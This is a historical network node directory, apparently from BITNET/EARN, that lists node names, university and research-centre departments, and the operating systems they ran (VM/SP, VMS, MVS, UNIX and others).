+UKANMED   U Kansas Med Ctr Dpt Info Sys             VM/SP
+DKAKFK51  U Karlsruhe Rechenzentrum                 VMS
+DKAUNI14  U Karlsruhe Rechenzentrum                 IBM VM/SP R4
+UKCC      U Kentucky Comp Ctr                       VM/SP
+UKCCB     U Kentucky Comp Ctr                       VM/SP
+UKCCS     U Kentucky Comp Ctr                       VM/SP HPO
+UKWANG    U Kentucky DP Ctr                         WANG VS
+UKMA      U Kentucky Math Sci                       UNIX BSD
+DKIUNI0   U Kiel                                    TOPS-10
+LAVALVM2  U Laval                                   VM/SP
+HLERUL53  U Leiden                                  VMS 4 5
+HLERUL2   U Leiden                                  MVS/SP 1 3
+HLERUL5   U Leiden                                  VMS 4 1
+HLERUL51  U Leiden                                  VMS 4 1
+HLERUL54  U Leiden Medical Infor                    VMS 4 1
+HMARL5    U Limburg                                 VMS 4
+ULKYVM    U Louisville Ctrl Comp                    VM/SP
+ULKYVX02  U Louisville VAX Cluster                  VMS
+ULKYVX04  U Louisville VAX Cluster                  VMS
+ULKYVX05  U Louisville VAX Cluster                  VMS
+ULKYVX03  U Louisville VAX Cluster                  VMS
+ULKYVX06  U Louisville VAX Cluster                  VMS
+ULKYVX07  U Louisville VAX Cluster                  VMS
+MECAN1    U Maine Computer Appl Network             VMS
+MAINE     U Maine Computing Center                  VM/SP
+PORTLAND  U Maine Portland Comp Ctr                 VM/SP
+UOFMCC    U Manitoba Comp Ctr
+UOFMCCX   U Manitoba Comp Ctr                       VM
+DMARUM8   U Mannheim                                SIEMENS BS2000
+UMDARS    U Maryland College Pk ARS Lab             VMS
+UMDARS1   U Maryland College Pk ARS1 Lab            VMS
+UMCINCOM  U Maryland College Pk Comp Sci Ctr        VMS
+UMDB      U Maryland College Pk Comp Sci Ctr        VM/SP
+UMDC      U Maryland College Pk Comp Sci Ctr        VM/SP
+UMDT      U Maryland College Pk Comp Sci Ctr        VM/SP
+UMD2      U Maryland College Pk Comp Sci Ctr        OS 1100
+UMBC1     U Maryland Comp Info Serv                 VMS
+UMDACC    U Maryland Computer Admin Compt Ctr.      VM/SP
+UMDD      U Maryland Computer Science Ctr           VM/SP
+UMES      U Maryland Eastern Shore                  VM/SP
+UMDENP    U Maryland Experimental Nuclear Phys      VMS
+UMDHEP    U Maryland High Energy Physics            VMS
+UMAB      U Maryland Medical School                 VM/SP
+UMUC      U Maryland U College                      VM/SP
+UMASSVM   U Mass Sch of Engineering                 VM/SP
+UMASS     U Massachusetts at Amherst                NOS 2.5.2
+DGOGWD01  U Max-Planck-Ges Goettingen               OS 1100
+UMICHUB   U Mich Comp Ctr.                          MTS
+UMICHUM   U Mich Comp Ctr.                          MTS
+UMDSCVM   U Mich Data Sys Ctr VM                    VM/SP
+UMDSCXA   U Mich Data Sys Ctr XA                    MVS/XA 2.2
+UMIPHYS   U Mich HEP                                VMS
+UMINN1    U Minnesota St. Paul Comp Ctr             VM/SP
+UMMVSA    U Missouri Central Facil                  MVS/SP
+UMVMA     U Missouri Central Facil                  VM/SP
+UMCVMB    U Missouri Columbia                       VM/HPO
+UMCECN01  U Missouri Columbia                       VMS
+UMCCSL1   U Missouri Columbia Campus - CC           VMS
+UMKCVAX1  U Missouri Kansas City                    VMS
+UMKCVAX2  U Missouri Kansas City                    VMS
+UMRVMC    U Missouri Rolla                          VM/SP
+UMRVMA    U Missouri Rolla Campus                   VM/SP
+UMRVMB    U Missouri Rolla Campus                   VM/HPO5
+UMRUNIXA  U Missouri Rolla Campus                   BSD 4.3
+UMSLVMA   U Missouri St. Louis Campus               VM/SP
+UMSLVMB   U Missouri St. Louis Campus               VM/SP
+UMSLVAXA  U Missouri St. Louis Campus               VMS
+UMKCVAX3  U Missouri Truman                         VMS
+UDEM      U Moncton                                 MPE V
+UNCCHEM   U N Carolina ACS                          VMS
+UNCVM1    U N Carolina ACS                          VM/SP
+UNCVX1    U N Carolina ACS                          VMS
+UNCSPHV3  U N Carolina Sch Publ Health              VMS
+UNCSPHVX  U N Carolina Sch Publ Health              VMS
+UNCSPHV2  U N Carolina Sch Publ Health              VMS
+UNLARS    U Nebr-Lincoln Agric Res Srv              VMS
+UNLAMC    U Nebr-Lincoln Amer Math Comp.            VMS
+UNLASVAX  U Nebr-Lincoln Arts & Sciences            VMS
+UNLVAX4   U Nebr-Lincoln CALMIT Lab                 VMS
+UNLCDC2   U Nebr-Lincoln Comp Res Ctr               NOS/VE
+UNLVAX1   U Nebr-Lincoln Comp Res Ctr               VMS
+UNLENVAX  U Nebr-Lincoln Eng. Coll                  VMS
+UNLVAX3   U Nebr-Lincoln Eng. Coll                  VMS
+UNLPDVAX  U Nebr-Lincoln Print & Dup                VMS
+UNLTCVAX  U Nebr-Lincoln Teach. Coll                VMS
+UNLADVAX  U Nebr-Lincoln VP Acad. Affairs           VMS
+UNLVM     U Nebraska Comp Svcs                      VM/SP/HPO
+UNLCDC3   U Nebraska Lincoln Comp Ctr               NOS
+UNBMVS1   U New Brunswick                           MVS/XA
+UNBVM1    U New Brunswick                           VM/SP 5
+UNMB      U New Mexico Comp Ctr                     VMS
+UNFVM     U North Florida Comp Svcs                 VM/SP
+IRISHMVS  U Notre Dame Comp Ctr                     MVS/SP
+UNDHEP    U Notre Dame High Ener Phys               VMS
+IRISHVM   U Notre Dame PC Lab                       VM/SP
+IRISHVM2  U Notre Dame PC Lab                       VM/SP
+IRISHVX2  U Notre Dame Physics Dept                 VMS
+NDRADLAB  U Notre Dame Radiation Lab                VMS
+ALASKA    U of Alaska Comp Net                      VMS
+BANUIA51  U of Antwerp                              VMS
+ARIZVM1   U of Arizona CCIT IBM                     VM
+ARIZJVAX  U of Arizona CCIT VAX                     VMS
+ARIZRVAX  U of Arizona CCIT VAX                     VMS
+UBCMTSA   U of BC Admin System                      MTS
+UCSFC450  U of California San Francisco             ULTRIX 32M
+UCSFFFFT  U of California San Francisco             ULTRIX
+UCSFUSE   U of California San Francisco             UNIX
+HGRRUG52  U of Groningen                            VMS 4 2
+UKAG      U of KY Agri Data Ctr                     VM/SP
+CCOL      U of Ky Community Colleges                VM/SP
+HLERUL56  U of Leiden DIOS                          VMS 4 2
+HLERUL55  U of Leiden DIOS                          VMS
+UC780     U of Maryland                             VMS
+ECSVAX    U of NC Gen'l Admin Cent Office - Educat. UNIX BSDrvs
+OREGON1   U of O CC                                 VM/SP
+UOTELG01  U of Ottawa Elec Eng                      VMS
+UTORDAIS  U of T DAIS                               VMS
+UTKVX2    U of Tennessee                            VMS
+UTKVX3    U of Tennessee Computing Center           VMS
+WATLAGER  U of Waterloo, EERC                       VMS
+WISCAGE   U of Wis, Inst on Aging                   VMS
+DOLUNI1   U Oldenburg                               IBM VM/SP R4
+DOSUNI    U Osnabrueck                              CGK BS 3
+UOTTAWA   U Ottawa Computer Ctr                     VM/HPO
+UOTCSI1   U Ottawa Computer Sci Dept                UNIX
+UOTCSI2   U Ottawa Computer Sci Dept                UNIX
+UOTADM01  U Ottawa Faculty of Admin                 VMS
+IPACUC    U Palermo                                 VM/SP
+PENNDRLN  U Penn DRL Comp Facil                     VM/SP
+PENNDRLS  U Penn DRL Comp Facil                     VM/SP HPO
+PENNLRSM  U Penn Matter Lab                         VMS
+PENNHEP1  U Penn Physics                            VMS
+PITTVMS   U Pittsburgh Comp Info Sys                VMS
+PITTUNIX  U Pittsburgh Comp Info Sys                ULTRIX
+EMDUPM11  U Poli Madrid Ctr Calc                    IBM VM/SP R4
+UPEI      U Prince Edward Island                    VMS
+UQAM      U Quebec Montreal                         VM/SP
+UREGINA1  U Regina                                  VM/SP
+UREGINAV  U Regina                                  VMS 4 5
+UREGINA2  U Regina Dept Comp Services               UNIX BSD
+UORCHEM   U Rochester Chemistry VAX                 VMS
+UORVM     U Rochester Comp Ctr                      VM/SP
+UORDB2    U Rochester Comp Ctr                      VMS
+UORHBV    U Rochester Comp Ctr                      VMS
+UORJVN    U Rochester Comp Ctr                      VMS
+UORKV     U Rochester Comp Ctr                      VMS
+UORKV2    U Rochester Comp Ctr                      VMS
+UORMVS    U Rochester Comp Ctr                      MVS/SP
+UORUNIX   U Rochester Comp Ctr                      UNIX BSD
+UORDBV    U Rochester Computing Ctr                 VMS
+UORGSM    U Rochester Grad Sch Mngmnt               VM/SP
+UORHEP    U Rochester High Energy Physics           VMS
+UOROPT    U Rochester Institue of Optics            VMS
+SASK      U Saskatchewan                            DEC VMS 4 7
+BAGAMCOK  U South Carolina Bus College              VM/SP
+UNIVSCVM  U South Carolina Comp Svcs                VM/SP
+KYLARA    U Southern Calif                          VMS
+MIRRIM    U Southern Calif                          VMS
+ZAPHOD    U Southern Calif                          VMS
+GEO       U Southern Calif                          VMS
+BMSR      U Southern Calif Biomed Simul Res         VMS
+RAMOTH    U Southern Calif Chemistry Dept           VMS
+JAXOM     U Southern Calif Eng Dept                 VMS
+MOUSE     U Southern Calif Eng Dept                 VMS
+PERN      U Southern Calif Engineering Sch          VMS
+SC        U Southern Calif Engineering Sch          VMS
+USCVM     U Southern California                     VM/HPO
+USMVAX    U Southern Maine Portland Comp Ctr        UNIX
+DS0RUS1I  U Stuttgart                               IBM VM/SP R2 1
+DS0RUS1P  U Stuttgart                               IBM VM/SP R2 1
+DS0IKE51  U Stuttgart Inst Kernenergetik            VMS
+DS0MPA51  U Stuttgart Materialpruef                 DEC VMS 4 7
+DS0RUS51  U Stuttgart Rechenzentrum                 VMS
+DS0RUS0   U Stuttgart, Germany                      NOS
+UTCVM     U Tenn at Chatta Ctr of Excel             VM/SP
+UTCMUSIC  U Tenn at Chatta MUSIC Sys                MUSIC/SP
+UTKVX1    U Tennessee                               VMS
+UTKSM1    U Tennessee                               VMS
+UTADNX    U Texas Austin Comp Ctr                   VMS
+UTA3081   U Texas Austin Comp Ctr                   VM/SP
+UTA4341   U Texas Austin Comp Ctr                   VM/SP
+UTGATE    U Texas Austin Comp Ctr                   VMS
+UTNET     U Texas Austin Comp Ctr                   VMS
+UTAIVC    U Texas Austin Comp Ctr                   VMS
+UTAIV1    U Texas Austin Comp Ctr                   VMS
+UTAIV2    U Texas Austin Comp Ctr                   VMS
+UTAIV3    U Texas Austin Comp Ctr                   VMS
+UTAIV4    U Texas Austin Comp Ctr                   VMS
+UTADP     U Texas Austin Data Proc. Sys             MVS/XA
+UTAPHY    U Texas Austin Physics Dept               VMS
+UTDALVM1  U Texas Dallas Acad Comp Ctr              VM/SP
+UTEPA     U Texas El Paso CC                        VM/SP
+UTEP      U Texas El Paso Comp Ctr                  VM/SP
+UTSA4381  U Texas San Antonio                       OS/VS1
+UTSAVM1   U Texas San Antonio Comp Res              VM/SP
+UOFT01    U Toledo                                  VM/SP
+UOFT02    U Toledo                                  VMS
+NORUNIT   U Trondheim                               IBM VM/SP R4
+DTUZDV2   U Tubingen ZDV BASF                       MVS/SP
+DTUZDV1   U Tubingen Zent Datenverar                IBM VM/SP R3
+UTHSCSA   U TX Hlth Sci Ctr Comp Resrcs             VMS
+SEUMDC01  U UME$                                    CDC NOS 2 3
+HUTRUU0   U Utrecht                                 AOS/VE
+HUTRUU51  U Utrecht Neth                            VMS 4 6
+UVUNIX    U Victoria UNIX
+UVPHYS    U Victoria VAX
+UVVM      U Victoria VM                             VM/SP
+VIRGINIA  U Virginia Acad Computing                 NOS
+UWACDC    U Washington Acad Comp Ctr                NOS
+UWAV1     U Washington Acad Comp Ctr VAX1           VMS
+UWAV2     U Washington Acad Comp Ctr VAX2           VMS
+UWAV3     U Washington Acad Comp Ctr VAX3           VMS
+UWAV4     U Washington Acad Comp Ctr VAX4           VMS
+MAX       U Washington Acad Comp Srvs               VMS
+UWAVM     U Washington Academic Comp Ctr            VM/SP
+UWAIS1    U Washington Admin Data Proc              VM/SP HPO
+UWAMVS1   U Washington Admin Data Proc              MVS/SP
+UWACHEM   U Washington Chemistry VAX                VMS
+UWASH     U Washington Cmptng. & Commun             VM/SP
+SAAM      U Washington Ctr for Bioeng.              VMS
+CPAC      U Washington Ctr for Process Analy Chem   VMS
+UWAEE     U Washington Electrical Engr              VM/SP
+UWAENG    U Washington Electrical Engr              VM/SP
+UWALOCKE  U Washington Locke Comp Ctr               VMS
+UWAPHAST  U Washington Physics VAX                  VMS
+WATACS    U Waterloo Adv Control Sys                VM/SP
+WATACO    U Waterloo Arts Comp Off                  VMS
+WATDCS    U Waterloo Comp Svcs                      VM/SP
+WATCSG    U Waterloo Comp Sys Grp                   VM/SP
+WATDCSU   U Waterloo Dept Comp Svcs                 UNIX BSD
+WATMTA    U Waterloo Dept Comp Svcs                 VMS
+WATSCI    U Waterloo Facil Science                  VMS
+WATMAD    U Waterloo Mapping Analysis & Design      VMS
+WATER     U Waterloo Math/ICR                       UNIX
+WATMNET   U Waterloo MICRONET                       VM/SP
+UWF       U West Fla Comp Ctr                       VM/SP
+UWOCC1    U Western Ontario                         VM/SP
+WINDSOR1  U Windsor                                 VM/SP
+WISCPSLB  U Wisconsin Dept Physics                  VMS
+WISCMAC1  U Wisconsin Madison Comp Ctr              VMS
+WISCPSLA  U Wisconsin Phys Sci Lab                  VMS
+WISCPSLC  U Wisconsin Physical Sci Lab              VMS
+DW0URZ0   U Wuppertal HRZ                           CDC NOS 2 3
+WYOCDC1   U Wyoming                                 NOS
+UWYO      U Wyoming                                 VMS
+DHBRRZ41  U. Bremen                                 SIEMENS BS3000 MSP 20
+FRUTC51   U.T.C. Compiegne, France                  DEC VMS
+DHDUB1    UB Heidelberg, Germany                    IBM VM/SP R4
+UCLASAUP  UCLA - Arch and Urban Plng                VM/SP
+UCLACH    UCLA Chem Dept.                           VMS
+UCLAUE    UCLA Crystallog. Res.                     VMS
+UCLASTRO  UCLA Department of Astronomy              VMS
+UCLAPH    UCLA Dept. of Physics                     VMS
+UCLAHEP   UCLA High Energy Physics                  VMS
+UCLAIEPI  UCLA IE Physics                           VMS
+UCLASP    UCLA Space & Plasma Physics               VMS
+UCLASS    UCLA Space Science                        VMS
+SBITP     UCSB Inst Theor Physics                   VMS
+UCSFCOPE  UCSF Clinic for Lab Medicine              ULTRIX
+BANUFS11  UFSIA, Antwerpen, Belgium                 VM/SP
+BANUIA52  UIA Antwerpen                             VMS 4 5
+UIUCVMC   UIUC - ENGR                               VM/SP
+UIUCVMD   UIUC _ CSO                                VM/SP
+BBRBFU01  ULB/VUB                                   NOS
+BLIULG14  ULG, Liege, Belgium                       VM/SP R5
+BLIULG15  ULG, Liege, Belgium                       VM/SP R5
+SEUMDC51  UMDAC Umea, Sweden                        DEC VMS
+GRATHUN1  UNATH, ATHENS, GREECE                     NOS 2 5.2 (678/670)
+UNC       UNC Comp Ctr                              MVS/SP
+UNCCVM    UNCC Compt. Srvs. VM                      VM/SP
+GRCRUN11  UNCR Heraklion, Crete, Greece             VM/SP
+GRCRVAX1  UNCR, Heraklion, Crete, Greece            VMS 4 3
+FRUNES21  UNESCO                                    MVS/SP
+DBTHRZ5   Uni Bayreuth RZ, Germany                  DEC VMS 4 6
+DERDBS5   Uni Erlangen                              VMS
+DFRRUF1   UNI Freiburg, Germany                     IBM VM/SP HPO R4
+DGIPIG5   Uni Giessen Physik, Germany               DEC VMS 4 5
+DHDURZ1   Uni Heidelberg                            IBM VM/SP R5
+DKAUNI5T  Uni Karlsruhe                             VMS
+DKAUNI0P  Uni Karlsruhe (IPF), Germany              PRIMOS REV. 20.0.4
+DKAUNI0I  Uni Karlsruhe (IRA), Germany              UNIX 4 3 BSD
+DKAUNI12  Uni Karlsruhe, Telematik                  IBM VM/SP R3
+DMZUK1    Uni Klinik Mainz, Germany                 IBM VM/SP R5 0
+DK0RRZK1  Uni Koeln, Germany                        IBM VM/SP R4
+DKNKURZ1  Uni Konstanz, Germany                     IBM VM/SP R5
+HLERUL57  Uni Leiden                                VMS 4 5
+HLERUL58  Uni Leiden, Netherlands                   VMS 4 5
+HLERUL5I  Uni Leiden, Netherlands                   SUN OS 3 5
+DMSWWU0X  Uni Muenster, Germany                     IBM IX/370
+DMSWWU5P  Uni Muenster, Kernphysik                  VMS
+HROEUR1   Uni Rotterdam, Netherlands                VM/SP R4 1
+HROEUR51  Uni Rotterdam, Netherlands                VMS 4
+CSGHSG52  Uni St Gallen, Switzerland                DEC VMS
+CSGHSG53  Uni St Gallen, Switzerland                DEC VMS
+DS0IND5   Uni Stuttgart, Germany                    DEC VMS 4.4
+DS0ITA51  Uni Stuttgart, Germany                    DEC VMS 4 6
+DS0RUS52  Uni Stuttgart, Germany                    DEC VMS 4 5
+DS0RUS54  Uni Stuttgart, Germany                    DEC VMS 4 5
+DS0MSV1   Uni Stuttgart, Germany                    IBM VM/SP R4
+DS0SYN51  Uni Stuttgart, Germany                    DEC VMS 4 6
+DS0IFU56  Uni Stuttgart, Germany                    DEC VMS 4 6
+DS0IFF5   Uni Stuttgart, Germany                    DEC VMS 4 2
+DTUMED1   Uni Tuebingen, Med. Rechenzent            IBM VM/SP
+HENTHT51  Uni Twente                                VMS 4
+HUTRUU52  Uni Utrecht, Netherlands                  VMS 4 6
+HUTRUU53  Uni Utrecht, Netherlands                  VMS 4 4
+CNEDCU51  Uni. Neuchatel, Switzerland               DEC VMS
+DKARH01   UNI-C, Aarhus, Denmark (CDC)              CDC NOS 2 4.1-630/628
+DKARH02   UNI-C, Aarhus, Denmark (VAX)              DEC VMS 4 4
+DANPOST   UNI-C, Aarhus, Denmark (VAX)              ULTRIX
+DKEARN    UNI-C, Lyngby, Denmark (IBM)              IBM VM/SP HPO R4 2
+NEUVM1    UNI-C, Lyngby, Denmark (IBM)              IBM VM/SP HPO R4 2
+DKUNIL51  UNI-C, Lyngby, Denmark (VAX)              DEC VMS 4 5
+NEUMVS1   UNI-C, Lyngby,Denmark (AMDAHL)            IBM MVS/XA
+USUHS     Uniformed Svrs Univ of Health Sci         VMS
+UNION     Union College                             VNS
+DBNINF5   Univ Bonn Informatik                      VMS
+UCLARUAC  Univ Calif Los Angeles UCLA/OAC           VMS
+UCCVMB    Univ Calif System-wide Admin              VM/HPO
+UCLAAIS   Univ California LA AIS                    MVS/XA
+EMDUCM11  Univ Complutense de Madrid                VM/SP
+UCHCECVM  Univ de Chile CEC                         VM/SP
+UCHDCI01  Univ de Chile DESECI                      VM/SP
+CFRUNI51  Univ de Fribourg                          DEC VMS 4 4
+USACHVM1  Univ de Santiago de Chile                 VM/SP
+UTALCAVX  Univ de Talca                             VMS
+DD0RUD81  Univ Duesseldorf                          SIEMENS BS2000 V8 0
+UGAIBM1   Univ Georgia                              MVS/JES3
+UGA205    Univ Georgia                              VSOS
+LAVALVX1  Univ Laval                                VMS
+LAVALMU1  Univ Laval Music Sys                      MUSIC/SP
+DMZRZU71  Univ Mainz                                BULL MULTICS MR 11R
+DMSWWU1C  Univ Muenster, Germany                    IBM VM/SP HPO R5 0
+UNAMVM1   Univ Nat'l Auto De Mexico                 VM
+UNBSJ     Univ New Brunswick St. John               PRIMOS
+NUNO      Univ New Orleans Admin DP                 MVS
+UNO       Univ New Orleans CRC                      VMS
+ARIZMIS   Univ of Arizona - MIS Dept                VMS
+SOVSET    Univ of Arizona - Soviet Studies          VMS
+ARIZEVAX  Univ of Arizona College of Eng. EVAX2     VMS
+UALR      Univ of Arkansas Little Rock              VMS
+UAFSYSA   Univ of Arkansas Main Camp                VM/SP
+UAFSYSB   Univ of Arkansas Main Camp                VM/SP HPO
+UAFMUSA   Univ of Arkansas Main Camp                MUSIC/SP
+UAMS      Univ of Arkansas Med Sci                  VMS
+UBCMTSG   Univ of BC General Sys                    MTS
+UBCMTSL   Univ of BC Library System                 MTS
+NOBERGEN  Univ of Bergen, Norway                    IBM VM/SP R5
+UNCAEDU   Univ of Calgary                           VMS
+UCSCZ     Univ of California CC Series Z            VMS
+UCSCCRLP  Univ of California Comp Res Lab Pger      UNIX
+UCSCCRLV  Univ of California Comp Res Lab Vger      UNIX
+UCSCCRLI  Univ of California Comp Res Lab VM        VM/SP
+UCSCCRLJ  Univ of California Comp Res Lab, Jup      UNIX
+UCSCCRLS  Univ of California Comp. Res Lab Saturn   UNIX
+UCSCLOA   Univ of California Lick Observ            UNIX
+UCSCERIS  Univ of California Physics Bd             UNIX 4.2
+UCSD      Univ of California San Diego Acad Gatwy SuSUN UNIX
+UCSDMVSA  Univ of California San Diego AdCom Op     MVS/XA
+UCDAVIS   Univ of California, Davis                 UNIX
+UCDHEP    Univ of California, Davis                 VMS
+UCHASTRO  Univ of Chicago - Astron/Astrophy         UNIX
+COLOLASP  Univ of Colorad / LASP                    VMS
+COLOSPGS  Univ of Colorado - Colorado Springs CS    VMS
+FARRAND   Univ of Colorado Boulder - Farrand Hall   VMS
+CUDENVER  Univ of Colorado Denver                   VMS
+UCOLMCC   Univ of Colorado Health Sci Ctr           VMS
+DAYTON    Univ of Dayton                            VMS
+DUCAIR    Univ of Denver Comptng & Info Res         VMS
+IFASGNV   Univ of Florida                           VMS
+CGEUGE53  Univ of Geneva                            DEC VMS
+CGEUGE11  Univ of Geneva                            IBM VM/SP
+CGEUGE54  Univ of Geneva                            DEC VMS
+UGACDC1   Univ of Georgia                           NOS
+UGA       Univ of Georgia                           VM/SP
+UGABUS    Univ of Georgia                           VM/SP
+UGAMUSIC  Univ of Georgia                           MUSIC/SP
+UGAXA     Univ of Georgia                           VM/XA/SF
+CCQC      Univ of Georgia                           VM/SP
+SREL      Univ of Georgia                           VMS
+TIFTON    Univ of Georgia Coastal Plains Exp Sta    VM/SP
+GRIFFIN   Univ of Georgia Experiment Station        VM/SP
+HARTFORD  Univ of Hartford                          VMS
+UHHEPG    Univ of Hawaii High Enrgy Phys Grp        VMS
+FINUHB    Univ of Helsinki                          VMS
+ISEARN    Univ of Iceland                           VM/SP
+IDCSVAX   Univ of Idaho                             VMS
+UIUCSCS   Univ of Illinois Chemistry                VMS
+UICBAL    Univ of Illinois Chicago Biomolec Analy LaVMS
+UKANVAX   Univ of Kansas VAX Sys                    VMS
+UKPR      Univ of Kentucky Prim                     PRIMOS
+FINKUO    Univ of Kuopio                            VMS
+CLSUNI51  Univ of Lausanne                          DEC VMS
+UMBSKY    Univ of Mass at Boston                    VMS
+UMBMAP    Univ of Mass at Boston                    VMS
+UMAECS    Univ of Mass, Eng. Comp Svrs              VMS
+UMBC2     Univ of MD, Baltimore Co                  VMS
+UMNACVX   Univ of Minnesota Acad Comptng            VMS
+UMNACBR   Univ of Minnesota Acad Comptng            VMS
+UMNACCA   Univ of Minnesota Acad Comptng            NOS
+UMNACUX   Univ of Minnesota Acad Comptng            UMAX 4.2
+UMNADMIN  Univ of Minnesota Admin Info Svcs         MVS
+UMNDUL    Univ of Minnesota Duluth                  VMS
+UMNHCS    Univ of Minnesota Health Comp Sci         VMS
+UMNHSNOS  Univ of Minnesota Health Sci Cmptng Srvs  NOS
+UMNHSNVE  Univ of Minnesota Health Sci Cmptng Srvs  NOS
+UMNMOR    Univ of Minnesota Morris                  VMS
+SIMVAX    Univ of Minnesota Sim Resource            VMS
+UMNSOM    Univ of Minnesota, Sch of Mgmt            VM/SP
+UMSVM     Univ of Mississippi                       VM/SP
+UMSMVS    Univ of Mississippi                       MVS/SP
+UMSNOS    Univ of Mississippi                       NOS
+UMSVSOS   Univ of Mississippi                       VSOS
+UMSPHY    Univ of Mississippi                       VMS
+UNMCVM    Univ of Nebraska Med Ctr                  VM/HPO
+UNOMA1    Univ of Nebraska Omaha CC                 VMS
+UNOMA2    Univ of Nebraska Omaha CC                 VMS
+UNEV      Univ of Nevada Sys CC                     NOS
+UNB       Univ of New Brunswick                     MVS/XA
+UNHH      Univ of New Hampshire                     VMS
+UNCVAX1   Univ of North Carolina CH                 VMS
+UNCG      Univ of North Carolina Greensboro Acad CC VMS
+UNTVM1    Univ of North Texas Comp Ctr              VM/SP
+UNTMUSIC  Univ of North Texas MUSIC
+NTSUVAXA  Univ of North Texas VAX A                 VMS
+NTSUVAXB  Univ of North Texas VAX B                 VMS
+UOKMVSA   Univ of Oklahoma Norman                   MVS/XA-JES2
+UOREGON   Univ of Oregon Dept. Comp. & Info Scie,   UNIX BSD
+UONEURO   Univ of Oregon Inst. of Neurosci VAX      VMS
+UOXRAY    Univ of Oregon Molecular Bio VAX          VMS
+OREGON    Univ of Oregon VAX 8800                   VMS
+UOTADM02  Univ of Ottawa
+UPRENET   Univ of Puerto Rico Ed Net                VMS
+URVAX     Univ of Richmond                          VMS
+UORNSRL   Univ of Rochester                         VMS
+SCRANTON  Univ of Scranton Comp Ctr                 VMS
+SCRVMSYS  Univ of Scranton Comp Ctr                 VM/SP
+UDESVM    Univ of Sherbrooke                        VM/SP 4
+UDESMA    Univ of Sherbrooke
+UDESMB    Univ of Sherbrooke
+USOUTHAL  Univ of South Alabama                     VM/SP
+USMCP6    Univ of Southern Miss                     CP6
+UTCHP1    Univ of Tennessee - Chatta.               MPE V/E
+UTKVX4    Univ of Tennessee Comp Ctr VAX4           VMS
+UTKCS1    Univ of Tennessee Computer Sci Dept       VMS
+UTMEM1    Univ of Tennessee, Memphis                VMS
+UTMEM2    Univ of Tennessee, Memphis                VMS
+UTMEM3    Univ of Tennessee, Memphis                VMS
+UTARLVM1  Univ of Texas - Arlington VM              VM/SP
+UTARLACS  Univ of Texas Arlington                   MVS/SP
+UTARLADM  Univ of Texas Arlington                   MVS/SP
+UTARLG    Univ of Texas Arlington                   VMS
+UTMBEACH  Univ of Texas Med Branch at Galveston     VMS
+UTSW      Univ of Texas Southwestern Med Ctr Dallas VMS
+UTHVM1    Univ of Texas Sys Cancer Ctr              VM/SP
+UTCHPC    Univ of Texas Sys Ctr for High Perfor CmptVMS
+UTARL     Univ of Texas Sys Off of Telecom. Srvcs   VMS
+UTDAL     Univ of Texas Sys Off of Telecom. Srvcs   VMS
+UTEPD     Univ of Texas Sys Off of Telecom. Srvcs   VMS
+UTHOU     Univ of Texas Sys Off of Telecom. Srvcs   VMS
+UTHSA     Univ of Texas Sys Off of Telecom. Srvcs   VMS
+UTHTYL    Univ of Texas Sys Off of Telecom. Srvcs   VMS
+UTMGAL    Univ of Texas Sys Off of Telecom. Srvcs   VMS
+UTPB      Univ of Texas Sys Off of Telecom. Srvcs   VMS
+UTSA      Univ of Texas Sys Off of Telecom. Srvcs   VMS
+UTSYS     Univ of Texas Sys Off of Telecom. Srvcs   VMS
+UTTYL     Univ of Texas Sys Off of Telecom. Srvcs   VMS
+UTSPH     Univ of Texas Sys Off of Telecom. Srvcs   VMS
+UTCCSP    Univ of Texas Sys Off of Telecom. Srvcs   VMS
+UTMSI     Univ of Texas Sys Off of Telecom. Srvcs   VMS
+THENIC    Univ of Texas Sys Off of Telecom. Srvcs   VMS
+UTHDAL    Univ of Texas Systems                     VMS
+JPNUTDME  Univ of Tokyo                             VM/SP
+JPNUTINS  Univ of Tokyo - INS                       OS IV/F4 MSP
+JPNUTKOM  Univ of Tokyo Coll of Arts & Sci          VM/SP
+JPNISSP   Univ of Tokyo/Inst for Solid St Phy       OS IV/F4 MSP
+UTORCSRI  Univ of Toronto
+UTORSCG   Univ of Toronto                           VM/SP
+UTORSCS   Univ of Toronto                           VMS
+UTORGPU   Univ of Toronto                           SUN BSD
+UTORMCL1  Univ of Toronto                           VMS
+UTORME    Univ of Toronto Mech Eng                  UNIX
+UTOROCI   Univ of Toronto OCI                       VMS
+UTORPHYS  Univ of Toronto Physics                   VMS
+JPNTSUKU  Univ of Tsukuba - SIPC                    DYNIX
+TULSA     Univ of Tulsa                             CP-6 C01
+UTAHCCA   Univ of Utah CC                           VMS
+UTAHBUS   Univ of Utah College of Bus CC            VM
+UTAHLIB   Univ of Utah Marriott Lib                 VM/SP
+UTAHMED   Univ of Utah Med Sch Scie CC              VMS
+UVMVM     Univ of Vermont                           VM/SP
+UVMADMIN  Univ of Vermont                           VM/SP
+UVMVAX    Univ of Vermont                           VMS
+UWAJANUS  Univ of Washington Astro. HST Project     VMS
+UWAGEM    Univ of Washington Gemini Comptng Faclty  VM/SP
+UWAMATSC  Univ of Washington Materials Sci Comp     VM/SP
+UWAPA2    Univ of Washington Physics Theory Grp     VMS
+UWOVAX    Univ of Western Ontario                   VMS
+WINDSOR2  Univ of Windsor                           VMS
+UWPG02    Univ of Winnipeg                          DEC VMS 5 0
+WISCCDE   Univ of Wis., Cntr. Demog.                VMS
+WISCPHEN  Univ of Wisc Pheno Inst                   MICROVMS
+WISCGPS   Univ of Wisc, Geog/PoliSci Depts          VMS
+UWLAX     Univ of Wisconsin - La Crosse             VMS
+UWMCSD4   Univ of Wisconsin - Milwaukee             UNIX
+UWSTOUT   Univ of Wisconsin - Stout                 VMS
+UWEC      Univ of Wisconsin Eau Claire              CP-6 COO
+WISCSOC   Univ of Wisconsin Madison Socio Dept      VMS
+OSHKOSHW  Univ of Wisconsin Oshkosh                 VMS
+WISCMAC3  Univ of Wisconsin, MACC                   VMS
+HROEUR0M  Univ Rotterdam                            MUSIC/SP
+EBCCUAB1  Univ. Autonoma de Barcelona               DEC VMS
+IMIBOCCO  Univ. BOCCONI - Milano, Italy             IBM VM/SP R4
+FINUH     Univ. of Helsinki, Finland                VMS 4.5
+FINUJO    Univ. of Joensuu, Finland                 DEC VMS 4 7
+FINTUVM   Univ. of Turku, Finland                   IBM VM/SP R5
+EBRUPC51  Univ. Politecnica de Catalunya            DEC VMS 4 5
+EMDICAI1  Univ. Pontificia Comillas, Sp             DG AOS/VS 6 06
+DK0RRZK0  Univer Koeln Regls Rechentrum             NOS
+EMDUAHM1  Universidad Alcala de Henares             DG AOS/VS 6 06
+EMDUAM12  Universidad Autonoma Madrid               IBM VM/SP R4
+EMDUAM51  Universidad Autonoma Madrid               VAX-VMS 4 7
+EB0UB011  Universidad Barcelona - Spain             VM/SP
+EBUBECM1  Universidad Barcelona - Spain             IBM VM CMS REL 5
